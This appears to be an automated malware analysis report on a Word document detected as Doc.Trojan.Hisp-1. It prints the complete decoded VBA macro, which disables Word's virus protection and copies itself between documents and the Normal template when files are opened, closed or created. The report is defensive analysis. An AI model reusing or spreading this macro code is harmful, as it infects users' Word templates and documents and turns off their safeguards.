MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro designed to execute code upon opening the document. The macro attempts to copy itself to the Normal template, suggesting an attempt at persistence or to infect other documents. The ClamAV detection 'Doc.Trojan.Hisp-1' further indicates malicious intent, likely to download and execute a secondary payload.
Heuristics 3
-
ClamAV: Doc.Trojan.Hisp-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Hisp-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1066 bytes |
SHA-256: c7cbe46ef45111758bcd7a225f39810423f8b3dcf464291e5420e95623746142 |
|||
|
Detection
ClamAV:
Doc.Trojan.Hisp-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'<HISpeedFuck>
'Coded by Destroyer Inc° 15.03.2000
Private Sub Document_Close()
On Error Resume Next
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
Set nt = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set ad = ActiveDocument.VBProject.VBComponents(1).CodeModule
If ad.Lines(1, 1) <> "'<HISpeedFuck>" Then
ad.DeleteLines 1, ad.CountofLines
ad.InsertLines 1, nt.Lines(1, nt.CountofLines)
End If
If nt.Lines(1, 1) <> "'<HISpeedFuck>" Then
nt.DeleteLines 1, nt.CountofLines
nt.InsertLines 1, ad.Lines(1, ad.CountofLines)
NormalTemplate.Save
End If
End Sub
Private Sub Document_New()
Document_Close
End Sub
Private Sub Document_Open()
Document_Close
End Sub
|
|||
ole10native_00.bin |
ole-package | OLE Ole10Native stream: ObjectPool/_911684018/Ole10Native | 1732 bytes |
SHA-256: ac5b03b85bf0a5d6131a60ba41b10c9fae80450fd2a183b9e69176aae91ad425 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.